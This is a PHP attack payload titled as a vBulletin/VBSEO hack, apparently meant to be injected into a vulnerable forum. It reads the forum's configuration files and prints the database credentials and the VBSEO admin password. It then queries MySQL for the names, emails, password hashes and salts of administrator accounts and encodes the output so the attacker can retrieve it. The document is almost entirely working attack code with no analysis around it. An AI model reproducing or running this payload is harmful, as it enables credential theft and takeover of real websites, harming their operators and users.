Vbulletin / VBSEO hack

echo md5('3c4eb64c8db01a5ab261e18fdc16089e');$oa=array('ecnt'=>0);function weh($en, $es, $ef, $el){global $oa;$oa['e'][]=array($en,$es,$ef,$el);};set_error_handler('weh');ini_set('log_errors',0);ob_start();
gtadmndtas();

function gtadmndtas()
{
    $out = $bf = $h = '';
    $ag = array();

    if(is_file('includes/config.php'))
    {
        include('includes/config.php');
        if(is_file('vbseo/resources/xml/config.xml'))
        {
            $bf = @file_get_contents('vbseo/resources/xml/config.xml');
        }
    }
    elseif(is_file('config.php'))
    {
        include('config.php');
        if(is_file('../vbseo/resources/xml/config.xml'))
        {
            $bf = @file_get_contents('../vbseo/resources/xml/config.xml');
        }
    }
    else
    {
        echo "BD error: config not found\n";
        return;
    }

    if(!empty($bf))
    {
        $a = strpos($bf, '<name>VBSEO_ADMIN_PASSWORD</name>');
        if($a !== false)
        {
            $a = strpos($bf, '<value>', $a + 10);
            $b = strpos($bf, '</value>', $a + 7);
            if(($a !== false) && ($b !== false))
            {
                $h = substr($bf, $a + 7, $b - $a - 7);
            }
        }
    }

    $out .= "---------------=-=pong1234321=-=--------------------------<br>\n";
    if(!empty($h))
    {
        $out .= "VBSH: {$h}<br>\n";
    }
    $out .= "ACP: {$config['Misc']['admincpdir']}<br>\n";
    $out .= "dbtype: {$config['Database']['dbtype']}<br>\n";
    $out .= "servername: {$config['MasterServer']['servername']}<br>\n";
    $out .= "port: {$config['MasterServer']['port']}<br>\n";
    $out .= "dbname: {$config['Database']['dbname']}<br>\n";
    $out .= "username: {$config['MasterServer']['username']}<br>\n";
    $out .= "password: {$config['MasterServer']['password']}<br>\n";
    $out .= "tableprefix: {$config['Database']['tableprefix']}<br>\n";
    $out .= "technicalemail: {$config['Database']['technicalemail']}<br>\n";
    $out .= "-----------------------------------------<br>\n";

    echo $out;
    $out = '';
    $gt = "{$config['Database']['tableprefix']}usergroup";
    $mt = "{$config['Database']['tableprefix']}user";

    $mysql_conn = mysql_connect("{$config['MasterServer']['servername']}:{$config['MasterServer']['port']}", $config['MasterServer']['username'], $config['MasterServer']['password']);
    if(!$mysql_conn)
    {
        echo "Mysql login failed!";
        return;
    }

    if(!mysql_select_db($config['Database']['dbname'], $mysql_conn))
    {
        echo "Mysql database selection failed!";
        return;
    }

    $sql = "SELECT usergroupid FROM $gt WHERE adminpermissions>1";
    $res = mysql_query($sql);
    if(!$res)
    {
        $err = mysql_error($mysql_conn);
        echo "Mysql query failed: $err";
        return;
    }

    while($row = mysql_fetch_assoc($res))
    {
        $ag[] = intval($row['usergroupid']);
    }

    $ags = implode(',',$ag);
    $sql = "SELECT userid,username,email,usergroupid,password,salt FROM $mt WHERE usergroupid IN ($ags)";
    $res = mysql_query($sql);
    if(!$res)
    {
        $err = mysql_error($mysql_conn);
        echo "Mysql query failed: $err";
        return;
    }

    while($row = mysql_fetch_assoc($res))
    {
        $data = implode("|:|", $row);
        $data = htmlentities($data);
        $out .= "$data<br>\n";
    }

    $out .= "-----------------------------------------\n<br>\n";
    echo $out;
    $out = '';
}
$out=ob_get_contents();ob_end_clean();$oa['d'][0]=$out;$out=serialize($oa);$out=gzcompress($out,9);$out=base64_encode($out);$out=str_replace('=','',$out);$out=str_rot13($out);echo($out);echo md5('117ae4783ac97ecf30b2419315518cd1');exit;